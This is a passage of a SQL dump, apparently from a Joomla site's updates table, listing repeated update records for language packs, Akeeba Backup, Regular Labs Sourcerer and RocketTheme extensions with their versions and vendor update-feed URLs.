Brazil','','pkg_pt-BR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(6950,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(6951,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(6952,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(6953,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(6954,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(6955,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(6956,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(6957,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(6958,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(6959,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(6960,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(6961,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(6962,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(6963,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(6964,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(6965,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(6966,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(6967,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.8','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3077',''),(6968,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(6969,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.4.7','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n			https://www.akeebabackup.com/download/fof3/3-4-7.html			\n		',''),(6970,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(6971,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(6972,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(6973,3,0,'French','','pkg_fr-FR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(6974,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(6975,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(6976,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(6977,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(6978,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(6979,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(6980,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(6981,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(6982,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(6983,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(6984,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(6985,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(6986,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(6987,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(6988,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(6989,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(6990,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(6991,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(6992,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(6993,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(6994,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(6995,3,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(6996,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(6997,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(6998,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(6999,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(7000,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(7001,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(7002,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(7003,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(7004,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(7005,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(7006,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(7007,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(7008,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(7009,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(7010,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(7011,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(7012,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(7013,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(7014,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(7015,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(7016,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(7017,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(7018,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(7019,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(7020,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(7021,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(7022,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(7023,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(7024,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(7025,57,0,'French','','pkg_fr-FR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(7026,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(7027,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(7028,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(7029,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(7030,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(7031,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(7032,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(7033,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(7034,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(7035,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(7036,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(7037,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(7038,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(7039,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(7040,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(7041,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(7042,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(7043,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(7044,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(7045,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(7046,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(7047,57,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(7048,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(7049,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(7050,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(7051,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(7052,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(7053,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(7054,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(7055,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(7056,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(7057,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(7058,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(7059,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(7060,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(7061,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(7062,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(7063,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(7064,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(7065,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(7066,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(7067,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(7068,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(7069,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(7070,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.8','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3077',''),(7071,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(7072,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.4.7','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n			https://www.akeebabackup.com/download/fof3/3-4-7.html			\n		',''),(7073,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(7074,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(7075,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(7076,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(7077,3,0,'French','','pkg_fr-FR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(7078,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(7079,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(7080,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(7081,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(7082,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(7083,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(7084,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(7085,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(7086,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(7087,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(7088,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(7089,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(7090,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(7091,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(7092,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(7093,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(7094,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(7095,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(7096,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(7097,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(7098,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(7099,3,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(7100,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(7101,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(7102,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(7103,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(7104,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(7105,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(7106,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(7107,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(7108,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(7109,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(7110,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(7111,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(7112,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(7113,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(7114,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(7115,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(7116,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(7117,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(7118,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(7119,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(7120,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(7121,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(7122,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(7123,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(7124,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(7125,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(7126,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(7127,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(7128,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(7129,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(7130,57,0,'French','','pkg_fr-FR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(7131,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(7132,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(7133,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(7134,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(7135,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(7136,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(7137,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(7138,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(7139,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(7140,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(7141,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(7142,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(7143,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(7144,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(7145,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(7146,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(7147,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(7148,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(7149,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(7150,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(7151,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(7152,57,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(7153,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(7154,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(7155,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(7156,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(7157,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(7158,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(7159,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(7160,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(7161,57,0,'Serbian 